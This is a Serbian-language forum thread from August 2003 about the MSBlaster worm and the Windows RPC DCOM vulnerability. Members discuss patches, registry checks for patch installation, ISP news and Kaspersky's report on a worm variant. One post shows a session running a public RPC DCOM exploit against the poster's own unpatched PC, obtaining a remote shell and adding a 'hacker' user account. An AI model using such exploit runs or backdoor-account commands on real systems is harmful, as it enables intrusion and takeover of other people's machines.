Šta je novo?
Od:
Filteri

RPC Interface Buffer Overrun Vulnerability - MSBLASTER WORM

Re: !

-=*[BarSel]*=- je napisao(la):
Konektovao sam se 5 puta da bih uspoe da presnimim onaj patch sto je delimir dao,jer nisam mogao stignem sve to za minut:D.Bas sam se posteno iznervirao.

Je6em ti majkroco(|)t
Kliknite za proširenje...

Da bi zaustavili taj dosadni automatski reboot:

shutdown /a
 
delimir je napisao(la):
Patch se nalazi na ovoj lokaciji:
http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en
Kliknite za proširenje...


Ne znam kako je na drugim masinama, al` nakon primene ovog patcha (kod mene) prestaje da radi tockic i pripadajuce (srednje) dugme na (genius) Netscroll Optical ps/2 misu (sa drajverom 6.02.00). Zamal` da kupim novog misa, al` onda digoh winme i tamo radi sve ok. Sa system restore vratim na stanje koje je bilo pre primene ovog patcha (nista drugo nije instalirano), i tockic proradi. Ponovicu postupak da bih bio sasvim siguran u ovo.

E sad, silno se iznervirah kada sam shvatio da nije lako naci e-mail microsoftove podrske kojoj bi covek mogao da prijavi da se desava glupost nakon primene njihovog patch-a. To je jedino moguce kroz komentar na web sajtu (tipa "da li vam je pomogao patch"). Naravno postoje razne vrste ms podrske koje se naplacuju, al to mi ne treba. Samo obicna mail adresa na koju covek moze da kaze - "ja se mozda slabo razumem al` vam patch 823980 na nekim masinama pravi sr*nje"

Genius sam vec kontaktirao, pa cu da vidim sta oni kazu. Spori su (3-5 dana), al` uvek odgovore.
 
imam isti mis i sve radi lepo posle patche-a
 
ZoNi je napisao(la):
ja imam XP Pro SP1, Kerio i NOD32... i sve je ok...

mada, ukljucen mi je automatski Win update, pa je verovatno skinuta ta zakrpa(?) --- kako mogu da vidim da li jeste?
Kliknite za proširenje...

Verifying patch installation:

* Windows 2000:

To verify that the patch has been installed on the machine, confirm that the following registry key has been created on the machine: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\ Q331953

To verify the individual files, use the date/time and version information provided in the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\ Q331953\Filelist.
* Windows XP:
o If installed on Windows XP Gold:

To verify that the patch has been installed, confirm that the following registry key has been created on the machine: HKLM\Software\Microsoft\Updates\Windows XP\SP1\Q331953.

To verify the individual files, use the date/time and version information provided in the following registry key: HKLM\Software\Microsoft\Updates\Windows XP\SP1\ Q331953\Filelist.

o If installed on Windows XP Service Pack 1:

To verify that the patch has been installed, confirm that the following registry key has been created on the machine: HKLM\Software\Microsoft\Updates\Windows XP\SP2\Q331953.

To verify the individual files, use the date/time and version information provided in the following registry key: HKLM\Software\Microsoft\Updates\Windows XP\SP2\Q331953\Filelist.
Kliknite za proširenje...

Verovatno jeste, obzirom da je patch objavljen još 16. jula. Sećam se čak sad i da je bilo po vestima na security sajtovima. Pametni ljudi su još tada zakrpili svoje mašine i sad spavaju mirno.
 
Ovo za miša sam gotovo siguran da nema nikakve veze sa pomenutim patchom. Verovatno je koincidencija. Seti se šta si još radio.
 
`fala kjgkreek i random (za misa), verovatno je nesto do mene, provericu ponovo.
 
Ma dobro, ovo sad se rasirio virus pa je sve postalo jako vidljivo. Inace, jos pre desetak dana se pojavio exploit, koji se kompajlira pod linuxom (video sam i Win32 portovanu verziju). Startujes, odaberes IP zrtve, koji operativni sistem koristi, i BUM - pravo dobijas windows cmd shell. Pa se neko posle pita kako i zasto mu je nestalo vreme na nalogu kod internet provajdera...
 
Bas gledam TV... ovaj worm se tako brzo siri da su poceli da ga pominju u vestima ovde kod mene; ispade jedan od najbrze sirecih wormova do sada...
 
Evo kako izgleda to u praksi - deisntalirao sam patch sa mog PC-ija i napao ga sa linux masine...


vlade@vladojko:~$ ./a.out -t 1 -d 10.0.0.1
RPC DCOM remote exploit - .:[oc192.us]:. Security
[+] Resolving host..
[+] Done.
-- Target: [WinXP-Universal]:10.0.0.1:135, Bindshell:666, RET=[0x0100139d]
[+] Connected to bindshell..

-- bling bling --

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

F:\WINDOWS\system32>cd \
cd \

F:\>dir
dir
Volume in drive F has no label.
Volume Serial Number is 248E-891B

Directory of F:\

04/20/2003 08:33 PM <DIR> Documents and Settings
06/03/2003 09:55 PM <DIR> Inetpub
08/10/2003 11:02 PM <DIR> lcc
04/18/2003 09:43 PM <DIR> Media
04/23/2003 11:05 PM <DIR> My Downloads
04/28/2003 09:33 PM <DIR> ProgDVB4.07
08/12/2003 11:44 AM <DIR> Program Files
08/09/2003 06:48 PM <DIR> TEMP
08/12/2003 08:57 PM <DIR> WINDOWS
0 File(s) 0 bytes
9 Dir(s) 7,361,462,272 bytes free

F:\>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter VMware Network Adapter VMnet8:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.217.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter VMware Network Adapter VMnet1:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.36.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.238.238
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.0.0.1
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . : 10.0.0.138

Ethernet adapter {9BE41FFF-FAEB-495F-B156-D0BE6D705255}:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 0.0.0.0
Subnet Mask . . . . . . . . . . . : 0.0.0.0
Default Gateway . . . . . . . . . :

F:\>net user hacker abc123 /add
net user hacker abc123 /add
The command completed successfully.


F:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__ ACTUser Admin
Administrator ASPNET Evy
Guest hacker HelpAssistant
IUSR_HP-C61LSHCY87KF IWAM_HP-C61LSHCY87KF SQLDebugger
SUPPORT_388945a0 Vlade VUSR_HP-C61LSHCY8
The command completed with one or more errors.


F:\>

--------------------------------------------

Sranie zar ne
 
Sorry za paniku drustvo, nema patch veze sa misem, ponovo sam ga primenio i sve je ok.(?)
 
Cekajte ljudi jel to na kraju Worm ili je to rupa u windowsu koju napadne neko spolja i brlja po masini ?

I da li je taj m***.exe worm ili je sistemski fajl koji pravi probleme ?
 
To je rupa u windowsu. Exploit postoji vec dve nedelje, a juce ili danas je se pojavio worm koji koristi tu rupu.
 
Eeeee... da sam znao ranije da je to skoro zakrpljeno ;>
Taj RPC exploit portovan na win32 imam od 27.07.... a mogao sam cudesa da napravim.
I normalno da sam zapatio slicnu stvar... nije msblast.exe nego ddhelp32.exe, kasperski ga detektuje kao Trojan.win32.crash..
Eto, ko se vatre lati, od vatre i pogiba ;)
 
23:39 11.8.2003.
CERT Advisory potvrdio postojanje sigurnosne greške u
Microsoft RPC Interface-u. Ugroženi su Windows NT 4.0, Windows NT 4.0 Terminal Server, Windows 2000, Windows XP i Windows 2003. Windows update i više detalja ovde.

Internet Worm glavna vest u svetu:
CNN.COM | ZD.NET | BBC | Microsoft | Windows Update

23:20 11.8.2003.
RPC DCOM Internet Worm
Počeo je da se širi u popodnevnim časovima. Korisnici VeratNet-a su u potpunosti zaštićeni od širenja ovog Worm-a. Više detalja o sigurnosnom propustu Windows OS-a možete pogledati ovde.
Kliknite za proširenje...

Kad je Verat u svoje vesti dodao ovo... mora da je opasan taj crv :)
 
Pazi, pretrazio sam sve zive file-ove i registry i nisam uspeo da ga nadjem. Ne budem lenj, pa instaliram W2K sa sp4 ponovo, i opet isto!!! E, sad radi sa ovim patch-em samo se pitam dokle, jer klonovi ce vrlo brzo da stignu, a onda!?
 
Posto se novi thread-ovi o istom problemu i dalje otvaraju, stavljam ovaj privremeno kao sticky, dok bude aktuelan tj. dok se ne slegne prasina.
 
A kako se drže naši ljubljeni provajderi?
Evo na PTTu je vrisnuo DNS, samo neznam jel od MSBlastera ili onako bez nekog povoda...
 
Korisnici VeratNet-a su u potpunosti zaštićeni od širenja ovog Worm-a. ;)
 
][V][ATRIX™ je napisao(la):
Korisnici VeratNet-a su u potpunosti zaštićeni od širenja ovog Worm-a. ;)
Kliknite za proširenje...
Samo ako nisu..... I Delimir i ja smo navukli virus konektovani na Verat.
 
ево да поѕдравим браћу по невољи :)
да обавјестим да је овај проблемчић допутовао у РС са малим закашњењем (и успјешно ми ресетовао ком 5 пута)

:D
 
Danas sam gledao na VOA kada je licno Bill Gates izrazio zaljenje sto koristimo usrani Windows koji je meka za viruse i sto smo po ko zna koji put meta za viruse (ovo je slobodna interpretacija tj. parafraziram gospodina Gatesa)
On je preporucio da se PRE apliciranja M$ patcha, obavezno u safe modu pokrene neki od dostupnih removal alata. Ja sam prvo instalirao patch i danas kada sam updateovao AVP i proskenirao HDD virus je i dalje bio na HDD-u.
Eto bar mi korisnici Windows-a nismo sami, nas Billi brine o svima nama. Bas je delovao zabrinuto (ili premoreno, ko zna :) )
 
hehe :)
My sorries :) Ipak ja ne menjam moju 98se !!
Ili je MOZDA i do Verata !? [just kiddin']
/me konektovan preko Verata i nishta ;)
 
:S :twisted: Krece nova varijanta, kao sto se i moglo ocekivati !!!

Najnovija vest sa Kasperskog:
Kaspersky Labs, a leading expert in information security, reports the detection of a new modification of the notorious "Lovesan" worm (also know as "Blaster").

Kaspersky Labs' experts anticipate that in the short run a repeated outbreak of the global scale may occur. This is because the two versions of "Lovesan" exploit the same vulnerability in Windows and may co-exist on the same computer. "In other words, all computers infected by the original "Lovesan" will soon be attacked by its revamped versio," commented Eugene Kaspersky, Head of Anti-Virus Research for Kaspersky Labs, "Taking into consideration that the amount of infected systems is now reaching 300,000 the return of the worm will imply a doubling of this number and lead to unpredictable results." In the worst case scenario the world community might face a global Internet slow-down and regional disruption of access to the World Wide Web: just as it happened in January 2003 due to the "Slammer" worm.

Technologically, the new modification of "Lovesan" is a copycat of the original. Slight changes were made only to the appearance of the worm: a new name of the main worm-carrier file (TEEKIDS.EXE instead of MSBLAST.EXE), a different method of code compression (FSG instead of UPX), and new "copyright" strings in the body of the worm abusing Microsoft and anti-virus developers.

Users of Kaspersky® Anti-Virus can be sure that this new worm will not harm to their computers. All Kaspersky Labs products effectively detect both modifications of "Lovesan", without requiring an update.
Kliknite za proširenje...
 
Ne mogu da verujem da je sve vise i vise ljudi inficirano ovim shitom... Ovo nikad nije bilo cini mi se... :shocked:
 
ljudi, problem sa ljudima je sto niko ne gleda apdejte na MS sajtu... jeste li za to da recimo ja krenem da izvestavam o nekim vaznim apdejtima vezanima za MS sisteme obzirom na njihovu veliku rasprostranjenost? meni nije problem posto se dnevno informisem o svim zakrpama za MS proizvode
 
Pa to bi bilo super, da ti daju jedan Sticky gde bi mogao da redovno pises sta ima novo.. Odlicna ideja! Ako te ne mrzi, a svima bi bilo od koristi.

Jer mnogi ne idu na MS sajt, jer je pretrpan, prespor... a i povrh svega ljudi ne mare bas za bezbednost...

cheers Nazdravlje!
 
Morate se prijaviti ili registrovati da odgovorite ovde.
Nazad
Vrh Dno